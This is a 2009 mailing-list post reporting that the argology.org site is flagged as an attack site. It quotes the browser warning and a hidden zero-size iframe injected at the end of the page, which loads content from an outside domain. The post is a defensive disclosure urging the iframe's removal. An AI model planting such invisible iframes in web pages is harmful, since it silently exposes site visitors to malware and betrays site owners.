[arg_discuss] Argology blacklisted

Andres M. Quijano andres at jengibre.com.ar
Sat Jul 4 12:05:34 EDT 2009

Hey guys and gals, I was browsing to the argology site today and it
was reported as an attack site

Quoting Firefox:
Reported Attack Site!

This web site at www.argology.org has been reported as an attack site
and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information,
use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many
are compromised without the knowledge or permission of their owners.

Upon closer inspection I noticed that on the end of the source code
there is this iframe that definitely looks suspicious:
<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a"
style="" marginheight="0" marginwidth="0" scrolling="no" width="0"
frameborder="0" height="0"></iframe>

So unless someone put it there on purpose, I strongly suggest inmediate removal!

If you need any technical help just let me know on or off list

--
Andrés Martínez Quijano
Jengibre